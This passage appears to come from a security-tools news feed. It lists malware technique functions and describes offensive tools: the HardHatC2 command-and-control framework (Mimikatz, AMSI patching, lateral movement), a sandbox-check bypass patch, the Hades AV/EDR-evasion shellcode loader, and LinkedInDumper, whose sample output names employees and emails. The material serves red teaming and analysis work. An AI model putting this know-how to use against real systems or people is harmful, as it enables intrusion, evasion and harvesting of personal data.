    MpfComMonitorChromeSessionOnce smelly__vx
    MpfExtractMaliciousPayloadFromZipFileNoPassword Codu

    Process Creation

    Function Name Original Author
    CreateProcessFromIHxHelpPaneServer James Forshaw
    CreateProcessFromIHxInteractiveUser James Forshaw
    CreateProcessFromIShellDispatchInvoke Mohamed Fakroud
    CreateProcessFromShellExecuteInExplorerProcess Microsoft
    CreateProcessViaNtCreateUserProcess CaptMeelo
    CreateProcessWithCfGuard smelly__vx and Adam Chester
    CreateProcessByWindowsRHotKey smelly__vx
    CreateProcessByWindowsRHotKeyEx smelly__vx
    CreateProcessFromINFSectionInstallStringNoCab smelly__vx
    CreateProcessFromINFSetupCommand smelly__vx
    CreateProcessFromINFSectionInstallStringNoCab2 smelly__vx
    CreateProcessFromIeFrameOpenUrl smelly__vx
    CreateProcessFromPcwUtil smelly__vx
    CreateProcessFromShdocVwOpenUrl smelly__vx
    CreateProcessFromShell32ShellExecRun smelly__vx
    MpfExecute64bitPeBinaryInMemoryFromByteArrayNoReloc aaaddress1
    CreateProcessFromWmiWin32_ProcessW CIA
    CreateProcessFromZipfldrRouteCall smelly__vx
    CreateProcessFromUrlFileProtocolHandler smelly__vx
    CreateProcessFromUrlOpenUrl smelly__vx
    CreateProcessFromMsHTMLW smelly__vx

    Process Injection

    Function Name Original Author
    MpfPiControlInjection SafeBreach Labs
    MpfPiQueueUserAPCViaAtomBomb SafeBreach Labs
    MpfPiWriteProcessMemoryCreateRemoteThread SafeBreach Labs
    MpfProcessInjectionViaProcessReflection Deep Instinct

    Proxied Functions

    Function Name Original Author
    IeCreateFile smelly__vx
    CopyFileViaSetupCopyFile smelly__vx
    CreateFileFromDsCopyFromSharedFile Jonas Lyk
    DeleteDirectoryAndSubDataViaDelNode smelly__vx
    DeleteFileWithCreateFileFlag smelly__vx
    IsProcessRunningAsAdmin2 smelly__vx
    IeCreateDirectory smelly__vx
    IeDeleteFile smelly__vx
    IeFindFirstFile smelly__vx
    IEGetFileAttributesEx smelly__vx
    IeMoveFileEx smelly__vx
    IeRemoveDirectory smelly__vx

    Shellcode Execution

    Function Name Original Author
    MpfSceViaImmEnumInputContext alfarom256, aahmad097
    MpfSceViaCertFindChainInStore alfarom256, aahmad097
    MpfSceViaEnumPropsExW alfarom256, aahmad097
    MpfSceViaCreateThreadpoolWait alfarom256, aahmad097
    MpfSceViaCryptEnumOIDInfo alfarom256, aahmad097
    MpfSceViaDSA_EnumCallback alfarom256, aahmad097
    MpfSceViaCreateTimerQueueTimer alfarom256, aahmad097
    MpfSceViaEvtSubscribe alfarom256, aahmad097
    MpfSceViaFlsAlloc alfarom256, aahmad097
    MpfSceViaInitOnceExecuteOnce alfarom256, aahmad097
    MpfSceViaEnumChildWindows alfarom256, aahmad097, wra7h
    MpfSceViaCDefFolderMenu_Create2 alfarom256, aahmad097, wra7h
    MpfSceViaCertEnumSystemStore alfarom256, aahmad097, wra7h
    MpfSceViaCertEnumSystemStoreLocation alfarom256, aahmad097, wra7h
    MpfSceViaEnumDateFormatsW alfarom256, aahmad097, wra7h
    MpfSceViaEnumDesktopWindows alfarom256, aahmad097, wra7h
    MpfSceViaEnumDesktopsW alfarom256, aahmad097, wra7h
    MpfSceViaEnumDirTreeW alfarom256, aahmad097, wra7h
    MpfSceViaEnumDisplayMonitors alfarom256, aahmad097, wra7h
    MpfSceViaEnumFontFamiliesExW alfarom256, aahmad097, wra7h
    MpfSceViaEnumFontsW alfarom256, aahmad097, wra7h
    MpfSceViaEnumLanguageGroupLocalesW alfarom256, aahmad097, wra7h
    MpfSceViaEnumObjects alfarom256, aahmad097, wra7h
    MpfSceViaEnumResourceTypesExW alfarom256, aahmad097, wra7h
    MpfSceViaEnumSystemCodePagesW alfarom256, aahmad097, wra7h
    MpfSceViaEnumSystemGeoID alfarom256, aahmad097, wra7h
    MpfSceViaEnumSystemLanguageGroupsW alfarom256, aahmad097, wra7h
    MpfSceViaEnumSystemLocalesEx alfarom256, aahmad097, wra7h
    MpfSceViaEnumThreadWindows alfarom256, aahmad097, wra7h
    MpfSceViaEnumTimeFormatsEx alfarom256, aahmad097, wra7h
    MpfSceViaEnumUILanguagesW alfarom256, aahmad097, wra7h
    MpfSceViaEnumWindowStationsW alfarom256, aahmad097, wra7h
    MpfSceViaEnumWindows alfarom256, aahmad097, wra7h
    MpfSceViaEnumerateLoadedModules64 alfarom256, aahmad097, wra7h
    MpfSceViaK32EnumPageFilesW alfarom256, aahmad097, wra7h
    MpfSceViaEnumPwrSchemes alfarom256, aahmad097, wra7h
    MpfSceViaMessageBoxIndirectW alfarom256, aahmad097, wra7h
    MpfSceViaChooseColorW alfarom256, aahmad097, wra7h
    MpfSceViaClusWorkerCreate alfarom256, aahmad097, wra7h
    MpfSceViaSymEnumProcesses alfarom256, aahmad097, wra7h
    MpfSceViaImageGetDigestStream alfarom256, aahmad097, wra7h
    MpfSceViaVerifierEnumerateResource alfarom256, aahmad097, wra7h
    MpfSceViaSymEnumSourceFiles alfarom256, aahmad097, wra7h

    String Manipulation

    Function Name Original Author
    ByteArrayToCharArray smelly__vx
    CharArrayToByteArray smelly__vx
    ShlwapiCharStringToWCharString smelly__vx
    ShlwapiWCharStringToCharString smelly__vx
    CharStringToWCharString smelly__vx
    WCharStringToCharString smelly__vx
    RtlInitEmptyUnicodeString ReactOS
    RtlInitUnicodeString ReactOS
    CaplockString simonc
    CopyMemoryEx ReactOS
    SecureStringCopy Apple (c) 1999
    StringCompare Apple (c) 1999
    StringConcat Apple (c) 1999
    StringCopy Apple (c) 1999
    StringFindSubstring Apple (c) 1999
    StringLength Apple (c) 1999
    StringLocateChar Apple (c) 1999
    StringRemoveSubstring smelly__vx
    StringTerminateStringAtChar smelly__vx
    StringToken Apple (c) 1999
    ZeroMemoryEx ReactOS
    ConvertCharacterStringToIntegerUsingNtdll smelly__vx
    MemoryFindMemory KamilCuk

    UAC Bypass

    Function Name Original Author
    UacBypassFodHelperMethod winscripting.blog

    Rad98 Hooking Engine

    Function Name Original Author
    InitHardwareBreakpointEngine rad98
    ShutdownHardwareBreakpointEngine rad98
    ExceptionHandlerCallbackRoutine rad98
    SetHardwareBreakpoint rad98
    InsertDescriptorEntry rad98
    RemoveDescriptorEntry rad98
    SnapshotInsertHardwareBreakpointHookIntoTargetThread rad98

    Generic Shellcode

    Function Name Original Author
    GenericShellcodeHelloWorldMessageBoxA SafeBreach Labs
    GenericShellcodeHelloWorldMessageBoxAEbFbLoop SafeBreach Labs
    GenericShellcodeOpenCalcExitThread MsfVenom


    ReconAIzer - A Burp Suite Extension To Add OpenAI (GPT) On Burp And Help You With Your Bug Bounty Recon To Discover Endpoints, Params, URLs, Subdomains And More!

    By: Zion3R


    ReconAIzer is a powerful Jython extension for Burp Suite that leverages OpenAI to help bug bounty hunters optimize their recon process. This extension automates various tasks, making it easier and faster for security researchers to identify and exploit vulnerabilities.

Once installed, ReconAIzer adds a contextual menu and a dedicated tab to display the results:


    Prerequisites

    • Burp Suite
    • Jython Standalone Jar

    Installation

    Follow these steps to install the ReconAIzer extension on Burp Suite:

    Step 1: Download Jython

    1. Download the latest Jython Standalone Jar from the official website: https://www.jython.org/download
    2. Save the Jython Standalone Jar file in a convenient location on your computer.

    Step 2: Configure Jython in Burp Suite

    1. Open Burp Suite.
    2. Go to the "Extensions" tab.
    3. Click on the "Extensions settings" sub-tab.
    4. Under "Python Environment," click on the "Select file..." button next to "Location of the Jython standalone JAR file."
    5. Browse to the location where you saved the Jython Standalone Jar file in Step 1 and select it.
    6. Wait for the "Python Environment" status to change to "Jython (version x.x.x) successfully loaded," where x.x.x represents the Jython version.

    Step 3: Download and Install ReconAIzer

    1. Download the latest release of ReconAIzer
    2. Open Burp Suite
    3. Go back to the "Extensions" tab in Burp Suite.
    4. Click the "Add" button.
    5. In the "Add extension" dialog, select "Python" as the "Extension type."
    6. Click on the "Select file..." button next to "Extension file" and browse to the location where you saved the ReconAIzer.py file in Step 3.1. Select the file and click "Open."
    7. Make sure the "Load" checkbox is selected and click the "Next" button.
    8. Wait for the extension to be loaded. You should see a message in the "Output" section stating that the ReconAIzer extension has been successfully loaded.

    Congratulations! You have successfully installed the ReconAIzer extension in Burp Suite. You can now start using it to enhance your bug bounty hunting experience.

Once that's done, you must configure your OpenAI API key in the "Config" tab under the "ReconAIzer" tab.

Feel free to suggest prompt improvements or anything you would like to see in ReconAIzer!

    Happy bug hunting!



    HardHatC2 - A C# Command And Control Framework

    By: Zion3R


    A cross-platform, collaborative, Command & Control framework written in C#, designed for red teaming and ease of use.

HardHat is a multiplayer C# .NET-based command and control framework designed to aid red team engagements and penetration testing. HardHat aims to improve quality-of-life factors during engagements by providing an easy-to-use but still robust C2 framework.
It contains three primary components: an ASP.NET teamserver, a Blazor .NET client, and C#-based implants.


    Release Tracking

    Alpha Release - 3/29/23 NOTE: HardHat is in Alpha release; it will have bugs, missing features, and unexpected things will happen. Thank you for trying it, and please report back any issues or missing features so they can be addressed.

    Community

Discord: Join the community to talk about HardHat C2, programming, red teaming, and general cyber security. The Discord community is also a great way to request help, submit new features, stay up to date on the latest additions, and submit bugs.

    Features

    Teamserver & Client

    • Per-operator accounts with account tiers to allow customized access control and features, including view-only guest modes, team-lead opsec approval(WIP), and admin accounts for general operation management.
    • Managers (Listeners)
    • Dynamic Payload Generation (Exe, Dll, shellcode, PowerShell command)
    • Creation & editing of C2 profiles on the fly in the client
    • Customization of payload generation
      • sleep time/jitter
      • kill date
      • working hours
      • type (Exe, Dll, Shellcode, ps command)
      • Included commands(WIP)
      • option to run confuser
    • File upload & Downloads
    • Graph View
    • File Browser GUI
    • Event Log
    • JSON logging for events & tasks
    • Loot tracking (Creds, downloads)
    • IOC tracing
    • Pivot proxies (SOCKS 4a, Port forwards)
    • Cred store
    • Autocomplete command history
    • Detailed help command
• Interactive bash terminal command if the client is on Linux (or PowerShell on Windows); this allows automatic parsing and logging of terminal commands like proxychains
    • Persistent database storage of teamserver items (User accounts, Managers, Engineers, Events, tasks, creds, downloads, uploads, etc. )
    • Recon Entity Tracking (track info about users/devices, random metadata as needed)
    • Shared files for some commands (see teamserver page for details)
    • tab-based interact window for command issuing
    • table-based output option for some commands like ls, ps, etc.
    • Auto parsing of output from seatbelt to create "recon entities" and fill entries to reference back to later easily
• Dark and Light themes

    Engineers

• C# .NET Framework implant for Windows devices, currently with CLR/.NET 4 support only
• At the moment there is only one implant, but more are planned
    • It can be generated as EXE, DLL, shellcode, or PowerShell stager
    • Rc4 encryption of payload memory & heap when sleeping (Exe / DLL only)
    • AES encryption of all network communication
    • ConfuserEx integration for obfuscation
    • HTTP, HTTPS, TCP, SMB communication
  • TCP & SMB can work P2P in bind or reverse setups
• Unique per-implant key generated at compile time
• Multiple callback URIs depending on the C2 profile
    • P/Invoke & D/Invoke integration for windows API calls
    • SOCKS 4a support
    • Reverse Port Forward & Port Forwards
    • All commands run as async cancellable jobs
      • Option to run commands sync if desired
    • Inline assembly execution & inline shellcode execution
    • DLL Injection
    • Execute assembly & Mimikatz integration
    • Mimikatz is not built into the implant but is pushed when specific commands are issued
    • Various localhost & network enumeration tools
    • Token manipulation commands
      • Steal Token Mask(WIP)
    • Lateral Movement Commands
    • Jump (psexec, wmi, wmi-ps, winrm, dcom)
    • Remote Execution (WIP)
    • AMSI & ETW Patching
    • Unmanaged Powershell
    • Script Store (can load multiple scripts at once if needed)
    • Spawn & Inject
      • Spawn-to is configurable
    • run, shell & execute

    Documentation

Documentation can be found at docs

    Getting Started

    Prerequisites

• Installation of the .NET 7 SDK from Microsoft
• Once installed, the teamserver and client are started with dotnet run

    Teamserver

To configure the teamserver's starting address (where clients will connect), edit HardHatC2\TeamServer\Properties\LaunchSettings.json, changing "applicationUrl": "https://127.0.0.1:5000" to the desired location and port. Start the teamserver with dotnet run from its top-level folder ../HardHatC2/Teamserver/
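
A minimal sketch of what the edited LaunchSettings.json might look like; only the applicationUrl key is taken from the text above, while the profile name and other keys are assumed for illustration:

{
  "profiles": {
    "TeamServer": {
      "commandName": "Project",
      "applicationUrl": "https://10.10.0.5:5000"
    }
  }
}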

    HardHat Client

1. When starting the client, set the target teamserver location by including it on the command line, e.g. dotnet run https://127.0.0.1:5000
2. Open a web browser and navigate to https://localhost:7096/. If this works, you should see the login page.
3. Log in with the HardHat_Admin user (the password is printed on first TeamServer startup).
4. Navigate to the settings page and create a new user. If successful, a message should appear; you may then log in with that account to access the full client.

    Contributions & Bug Reports

Code contributions are welcome. Feel free to submit feature requests, pull requests, or send me your ideas on Discord.



    Burpgpt - A Burp Suite Extension That Integrates OpenAI's GPT To Perform An Additional Passive Scan For Discovering Highly Bespoke Vulnerabilities, And Enables Running Traffic-Based Analysis Of Any Type

    By: Zion3R


    burpgpt leverages the power of AI to detect security vulnerabilities that traditional scanners might miss. It sends web traffic to an OpenAI model specified by the user, enabling sophisticated analysis within the passive scanner. This extension offers customisable prompts that enable tailored web traffic analysis to meet the specific needs of each user. Check out the Example Use Cases section for inspiration.

    The extension generates an automated security report that summarises potential security issues based on the user's prompt and real-time data from Burp-issued requests. By leveraging AI and natural language processing, the extension streamlines the security assessment process and provides security professionals with a higher-level overview of the scanned application or endpoint. This enables them to more easily identify potential security issues and prioritise their analysis, while also covering a larger potential attack surface.

    [!WARNING] Data traffic is sent to OpenAI for analysis. If you have concerns about this or are using the extension for security-critical applications, it is important to carefully consider this and review OpenAI's Privacy Policy for further information.

    [!WARNING] While the report is automated, it still requires triaging and post-processing by security professionals, as it may contain false positives.

    [!WARNING] The effectiveness of this extension is heavily reliant on the quality and precision of the prompts created by the user for the selected GPT model. This targeted approach will help ensure the GPT model generates accurate and valuable results for your security analysis.

     

    Features

    • Adds a passive scan check, allowing users to submit HTTP data to an OpenAI-controlled GPT model for analysis through a placeholder system.
    • Leverages the power of OpenAI's GPT models to conduct comprehensive traffic analysis, enabling detection of various issues beyond just security vulnerabilities in scanned applications.
    • Enables granular control over the number of GPT tokens used in the analysis by allowing for precise adjustments of the maximum prompt length.
    • Offers users multiple OpenAI models to choose from, allowing them to select the one that best suits their needs.
    • Empowers users to customise prompts and unleash limitless possibilities for interacting with OpenAI models. Browse through the Example Use Cases for inspiration.
    • Integrates with Burp Suite, providing all native features for pre- and post-processing, including displaying analysis results directly within the Burp UI for efficient analysis.
    • Provides troubleshooting functionality via the native Burp Event Log, enabling users to quickly resolve communication issues with the OpenAI API.

    Requirements

    1. System requirements:
    • Operating System: Compatible with Linux, macOS, and Windows operating systems.

    • Java Development Kit (JDK): Version 11 or later.

    • Burp Suite Professional or Community Edition: Version 2023.3.2 or later.

      [!IMPORTANT] Please note that using any version lower than 2023.3.2 may result in a java.lang.NoSuchMethodError. It is crucial to use the specified version or a more recent one to avoid this issue.

2. Build tool:
• Gradle: Version 6.9 or later (recommended). The build.gradle file is provided in the project repository.
3. Environment variables:
• Set up the JAVA_HOME environment variable to point to the JDK installation directory, for example as shown below.
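
A minimal example of setting JAVA_HOME on Linux/macOS; the JDK path is illustrative and depends on your installation:

export JAVA_HOME=/usr/lib/jvm/jdk-11
export PATH="$JAVA_HOME/bin:$PATH"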

    Please ensure that all system requirements, including a compatible version of Burp Suite, are met before building and running the project. Note that the project's external dependencies will be automatically managed and installed by Gradle during the build process. Adhering to the requirements will help avoid potential issues and reduce the need for opening new issues in the project repository.

    Installation

    1. Compilation

    1. Ensure you have Gradle installed and configured.

    2. Download the burpgpt repository:

      git clone https://github.com/aress31/burpgpt
      cd .\burpgpt\
    3. Build the standalone jar:

      ./gradlew shadowJar

    2. Loading the Extension Into Burp Suite

    To install burpgpt in Burp Suite, first go to the Extensions tab and click on the Add button. Then, select the burpgpt-all jar file located in the .\lib\build\libs folder to load the extension.

    Usage

    To start using burpgpt, users need to complete the following steps in the Settings panel, which can be accessed from the Burp Suite menu bar:

    1. Enter a valid OpenAI API key.
    2. Select a model.
    3. Define the max prompt size. This field controls the maximum prompt length sent to OpenAI to avoid exceeding the maxTokens of GPT models (typically around 2048 for GPT-3).
    4. Adjust or create custom prompts according to your requirements.

    Once configured as outlined above, the Burp passive scanner sends each request to the chosen OpenAI model via the OpenAI API for analysis, producing Informational-level severity findings based on the results.

    Prompt Configuration

    burpgpt enables users to tailor the prompt for traffic analysis using a placeholder system. To include relevant information, we recommend using these placeholders, which the extension handles directly, allowing dynamic insertion of specific values into the prompt:

    Placeholder Description
    {REQUEST} The scanned request.
    {URL} The URL of the scanned request.
    {METHOD} The HTTP request method used in the scanned request.
    {REQUEST_HEADERS} The headers of the scanned request.
    {REQUEST_BODY} The body of the scanned request.
    {RESPONSE} The scanned response.
    {RESPONSE_HEADERS} The headers of the scanned response.
    {RESPONSE_BODY} The body of the scanned response.
    {IS_TRUNCATED_PROMPT} A boolean value that is programmatically set to true or false to indicate whether the prompt was truncated to the Maximum Prompt Size defined in the Settings.

    These placeholders can be used in the custom prompt to dynamically generate a request/response analysis prompt that is specific to the scanned request.
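
Conceptually, this amounts to simple string replacement before the prompt is sent to the model. The following Python sketch is purely illustrative and is not the extension's actual code; the template and values are made up:

# Hypothetical illustration of placeholder substitution (not burpgpt's real code)
template = "Analyse the {METHOD} request to {URL} for vulnerabilities:\n{REQUEST_HEADERS}"
values = {
    "{METHOD}": "POST",
    "{URL}": "https://example.com/login",
    "{REQUEST_HEADERS}": "Host: example.com",
}
prompt = template
for placeholder, value in values.items():
    prompt = prompt.replace(placeholder, value)
print(prompt)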

[!NOTE] Burp Suite provides the capability to support arbitrary placeholders through the use of Session handling rules or extensions such as Custom Parameter Handler, allowing for even greater customisation of the prompts.

    Example Use Cases

    The following list of example use cases showcases the bespoke and highly customisable nature of burpgpt, which enables users to tailor their web traffic analysis to meet their specific needs.

    • Identifying potential vulnerabilities in web applications that use a crypto library affected by a specific CVE:

      Analyse the request and response data for potential security vulnerabilities related to the {CRYPTO_LIBRARY_NAME} crypto library affected by CVE-{CVE_NUMBER}:

      Web Application URL: {URL}
      Crypto Library Name: {CRYPTO_LIBRARY_NAME}
      CVE Number: CVE-{CVE_NUMBER}
      Request Headers: {REQUEST_HEADERS}
      Response Headers: {RESPONSE_HEADERS}
      Request Body: {REQUEST_BODY}
      Response Body: {RESPONSE_BODY}

      Identify any potential vulnerabilities related to the {CRYPTO_LIBRARY_NAME} crypto library affected by CVE-{CVE_NUMBER} in the request and response data and report them.
    • Scanning for vulnerabilities in web applications that use biometric authentication by analysing request and response data related to the authentication process:

      Analyse the request and response data for potential security vulnerabilities related to the biometric authentication process:

      Web Application URL: {URL}
      Biometric Authentication Request Headers: {REQUEST_HEADERS}
      Biometric Authentication Response Headers: {RESPONSE_HEADERS}
      Biometric Authentication Request Body: {REQUEST_BODY}
      Biometric Authentication Response Body: {RESPONSE_BODY}

      Identify any potential vulnerabilities related to the biometric authentication process in the request and response data and report them.
    • Analysing the request and response data exchanged between serverless functions for potential security vulnerabilities:

      Analyse the request and response data exchanged between serverless functions for potential security vulnerabilities:

      Serverless Function A URL: {URL}
      Serverless Function B URL: {URL}
      Serverless Function A Request Headers: {REQUEST_HEADERS}
      Serverless Function B Response Headers: {RESPONSE_HEADERS}
      Serverless Function A Request Body: {REQUEST_BODY}
      Serverless Function B Response Body: {RESPONSE_BODY}

      Identify any potential vulnerabilities in the data exchanged between the two serverless functions and report them.
    • Analysing the request and response data for potential security vulnerabilities specific to a Single-Page Application (SPA) framework:

      Analyse the request and response data for potential security vulnerabilities specific to the {SPA_FRAMEWORK_NAME} SPA framework:

      Web Application URL: {URL}
      SPA Framework Name: {SPA_FRAMEWORK_NAME}
      Request Headers: {REQUEST_HEADERS}
      Response Headers: {RESPONSE_HEADERS}
      Request Body: {REQUEST_BODY}
      Response Body: {RESPONSE_BODY}

      Identify any potential vulnerabilities related to the {SPA_FRAMEWORK_NAME} SPA framework in the request and response data and report them.

    Roadmap

    • Add a new field to the Settings panel that allows users to set the maxTokens limit for requests, thereby limiting the request size.
    • Add support for connecting to a local instance of the AI model, allowing users to run and interact with the model on their local machines, potentially improving response times and data privacy.
    • Retrieve the precise maxTokens value for each model to transmit the maximum allowable data and obtain the most extensive GPT response possible.
    • Implement persistent configuration storage to preserve settings across Burp Suite restarts.
    • Enhance the code for accurate parsing of GPT responses into the Vulnerability model for improved reporting.

    Project Information

    The extension is currently under development and we welcome feedback, comments, and contributions to make it even better.

    Sponsor

If this extension has saved you time and hassle during a security assessment, consider showing some love by sponsoring a cup of coffee for the developer. It's the fuel that powers development, after all. Just hit that shiny Sponsor button at the top of the page or click here to contribute and keep the caffeine flowing.

    Reporting Issues

    Did you find a bug? Well, don't just let it crawl around! Let's squash it together like a couple of bug whisperers!

    Please report any issues on the GitHub issues tracker. Together, we'll make this extension as reliable as a cockroach surviving a nuclear apocalypse!

    Contributing

    Looking to make a splash with your mad coding skills?

    Awesome! Contributions are welcome and greatly appreciated. Please submit all PRs on the GitHub pull requests tracker. Together we can make this extension even more amazing!

    License

    See LICENSE.



Bypass-Sandbox-Evasion - Bypass Malware Sandbox Evasion RAM Check

    By: Zion3R


Sandboxes are commonly used to analyze malware. They provide a temporary, isolated, and secure environment in which to observe whether a suspicious file exhibits any malicious behavior. However, malware developers have also developed methods to evade sandboxes and analysis environments. One such method is to perform checks to determine whether the machine the malware is being executed on is operated by a real user. One such check is the RAM size: if the RAM size is unrealistically small (e.g., 1GB), it may indicate that the machine is a sandbox. If the malware detects a sandbox, it will not execute its true malicious behavior and may appear to be a benign file.

    Details

• The GetPhysicallyInstalledSystemMemory API retrieves the amount of RAM that is physically installed on the computer from the SMBIOS firmware tables. It takes a PULONGLONG parameter and returns TRUE if the function succeeds, setting TotalMemoryInKilobytes to a nonzero value. If the function fails, it returns FALSE.

• The amount of physical memory retrieved by the GetPhysicallyInstalledSystemMemory function must be equal to or greater than the amount reported by the GlobalMemoryStatusEx function; if it is less, the SMBIOS data is malformed and the function fails with ERROR_INVALID_DATA. Malformed SMBIOS data may indicate a problem with the user's computer.

• The register rcx holds the parameter TotalMemoryInKilobytes. To overwrite the jump address of GetPhysicallyInstalledSystemMemory, I use the following opcodes: mov qword ptr ss:[rcx],4193B840. This writes the value 0x4193B840 (about 1.1 TB, since the count is in kilobytes) into the memory rcx points to. Then, the ret instruction is used to pop the return address off the stack and jump to it. Therefore, whenever GetPhysicallyInstalledSystemMemory is called, the caller's TotalMemoryInKilobytes is set to the custom value. A minimal sketch of the check being defeated appears below.
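
For reference, here is a minimal, Windows-only Python sketch of the RAM check a sample might perform, using ctypes to call the real GetPhysicallyInstalledSystemMemory; the 4 GB threshold is an illustrative assumption, not taken from the tool:

import ctypes

total_kb = ctypes.c_ulonglong(0)
# BOOL GetPhysicallyInstalledSystemMemory(PULONGLONG TotalMemoryInKilobytes)
ok = ctypes.windll.kernel32.GetPhysicallyInstalledSystemMemory(ctypes.byref(total_kb))
if ok and total_kb.value < 4 * 1024 * 1024:  # less than ~4 GB installed
    print("[!] Unrealistically low RAM - possible sandbox")
else:
    print("[+] RAM check passed:", total_kb.value, "KB installed")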



    LinkedInDumper - Tool To Dump Company Employees From LinkedIn API

    By: Zion3R

    Python 3 script to dump company employees from LinkedIn API

    Description

    LinkedInDumper is a Python 3 script that dumps employee data from the LinkedIn social networking platform.

The results contain firstname, lastname, position (title), location and a user's profile link. Only 2 API calls are required to retrieve all employees if the company has no more than 10 employees; otherwise, we have to paginate through the API results. With the --email-format CLI flag, one can define a Python string format to auto-generate email addresses based on the retrieved first and last name, as sketched below.
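
For illustration, these format strings are plain Python str.format templates where {0} is the first name and {1} is the last name; the names here are made up:

first, last = "john", "doe"
print("{0}.{1}@example.com".format(first, last))    # john.doe@example.com
print("{0[0]}{1}@example.com".format(first, last))  # jdoe@example.com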


    Requirements

LinkedInDumper talks to the unofficial LinkedIn Voyager API, which requires authentication. Therefore, you must have a valid LinkedIn user account. To keep it simple, LinkedInDumper just expects a cookie value provided by you. This way, even 2FA-protected accounts are supported. Furthermore, you must provide a LinkedIn company URL to dump employees from.

    Retrieving LinkedIn Cookie

    1. Sign into www.linkedin.com and retrieve your li_at session cookie value e.g. via developer tools
2. Specify the cookie value either persistently in the Python script's variable li_at or temporarily at runtime via the CLI flag --cookie

    Retrieving LinkedIn Company URL

    1. Search your target company on Google Search or directly on LinkedIn
    2. The LinkedIn company URL should look something like this: https://www.linkedin.com/company/apple

    Usage

    usage: linkedindumper.py [-h] --url <linkedin-url> [--cookie <cookie>] [--quiet] [--include-private-profiles] [--email-format EMAIL_FORMAT]

    options:
    -h, --help show this help message and exit
    --url <linkedin-url> A LinkedIn company url - https://www.linkedin.com/company/<company>
    --cookie <cookie> LinkedIn 'li_at' session cookie
    --quiet Show employee results only
    --include-private-profiles
    Show private accounts too
    --email-format Python string format for emails; for example:
    [1] john.doe@example.com > '{0}.{1}@example.com'
    [2] j.doe@example.com > '{0[0]}.{1}@example.com'
    [3] jdoe@example.com > '{0[0]}{1}@example.com'
    [4] doe@example.com > '{1}@example.com'
    [5] john@example.com > '{0}@example.com'
    [6] jd@example.com > '{0[0]}{1[0]}@example.com'

    Example 1 - Docker Run

    docker run --rm l4rm4nd/linkedindumper:latest --url 'https://www.linkedin.com/company/apple' --cookie <cookie> --email-format '{0}.{1}@apple.de'

    Example 2 - Native Python

    # install dependencies
    pip install -r requirements.txt

    python3 linkedindumper.py --url 'https://www.linkedin.com/company/apple' --cookie <cookie> --email-format '{0}.{1}@apple.de'

    Outputs

    The script will return employee data as semi-colon separated values (like CSV):

     ██▓     ██▓ ███▄    █  ██ ▄█▀▓█████ ▓█████▄  ██▓ ███▄    █ ▓█████▄  █    ██  ███▄ ▄███▓ ██▓███  ▓█████  ██▀███  
▓██▒ ▓██▒ ██ ▀█ █ ██▄█▒ ▓█ ▀ ▒██▀ ██▌▓██▒ ██ ▀█ █ ▒██▀ ██▌ ██ ▓██▒▓██▒▀█▀ ██▒▓██░ ██▒▓█ ▀ ▓██ ▒ ██▒
    ▒██░ ▒██▒▓██ ▀█ ██▒▓███▄░ ▒███ ░██ █▌▒██▒▓██ ▀█ ██▒░██ █▌▓██ ▒██░▓██ ▓██░▓██░ ██▓▒▒███ ▓██ ░▄█ ▒
▒██░ ░██░▓██▒ ▐▌██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌░██░▓██▒ ▐▌██▒░▓█▄ ▌▓▓█ ░██░▒██ ▒██ ▒██▄█▓▒ ▒▒▓█ ▄ ▒██▀▀█▄
░██████▒░██░▒██░ ▓██░▒██▒ █▄░▒████▒░▒████▓ ░██░▒██░ ▓██░░▒████▓ ▒▒█████▓ ▒██▒ ░██▒▒██▒ ░ ░░▒████▒░██▓ ▒██▒
    ░ ▒░▓ ░░▓ ░ ▒░ ▒ ▒ ▒ ▒▒ ▓▒░░ ▒░ ░ ▒▒▓ ▒ ░▓ ░ ▒░ ▒ ▒ ▒▒▓ ▒ ░▒▓▒ ▒ ▒ ░ ▒░ ░ ░▒▓▒░ ░ ░░░ ▒░ ░░ ▒▓ ░▒▓░
    ░ ░ ▒ ░ ▒ ░░ ░░ ░ ▒░░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ ▒ ░░ ░░ ░ ▒░ ░ ▒ ▒ ░░▒░ ░ ░ ░ ░ ░░▒ ░ ░ ░ ░ ░▒ ░ ▒░
    ░ ░ ▒ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░░░ ░ ░ ░ ░ ░░ ░ ░░ ░
    ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░
    ░ ░ ░ by LRVT

    [i] Company Name: apple
    [i] Company X-ID: 162479
    [i] LN Employees: 1000 employees found
    [i] Dumping Date: 17/10/2022 13:55:06
    [i] Email Format: {0}.{1}@apple.de
    Firstname;Lastname;Email;Position;Gender;Location;Profile
    Katrin;Honauer;katrin.honauer@apple.com;Software Engineer at Apple;N/A;Heidelberg;https://www.linkedin.com/in/katrin-honauer
    Raymond;Chen;raymond.chen@apple.com;Recruiting at Apple;N/A;Austin, Texas Metropolitan Area;https://www.linkedin.com/in/raytherecruiter

    [i] Successfully crawled 2 unique apple employee(s). Hurray ^_-

    Limitations

LinkedIn will only return the first 1,000 search results when harvesting contact information. You may also need a LinkedIn premium account once you have reached the maximum number of queries allowed for visiting profiles with your freemium LinkedIn account.

Furthermore, not all employee profiles are public. The results vary depending on the LinkedIn account used and whether you are connected with some employees of the company to crawl. Therefore, it is sometimes not possible to retrieve the firstname, lastname and profile URL of some employee accounts. The script will not display such profiles, as they contain default values such as "LinkedIn" as firstname and "Member" as lastname. If you want to include such private profiles, please use the CLI flag --include-private-profiles. Although some accounts may be private, we can obtain the position (title) as well as the location of such accounts. Only firstname, lastname and profile URL are hidden for private LinkedIn accounts.

Finally, LinkedIn users are free to name their profile however they like. An account name can therefore contain various things such as salutations, abbreviations, emojis, middle names, etc. I tried my best to remove some nonsense; however, this is not a complete solution to the general problem. Note that we are not using the official LinkedIn API. This script gathers information from the "unofficial" Voyager API.



    Hades - Go Shellcode Loader That Combines Multiple Evasion Techniques

    By: Zion3R


Hades is a proof-of-concept loader that combines several evasion techniques with the aim of bypassing the defensive mechanisms commonly used by modern AV/EDRs.


    Usage

The easiest way is probably to build the project on Linux using make.

    git clone https://github.com/f1zm0/hades && cd hades
    make

Then you can bring the executable to an x64 Windows host and run it with .\hades.exe [options].

    PS > .\hades.exe -h

    '||' '||' | '||''|. '||''''| .|'''.|
    || || ||| || || || . ||.. '
    ||''''|| | || || || ||''| ''|||.
    || || .''''|. || || || . '||
    .||. .||. .|. .||. .||...|' .||.....| |'....|'

    version: dev [11/01/23] :: @f1zm0

    Usage:
    hades -f <filepath> [-t selfthread|remotethread|queueuserapc]

    Options:
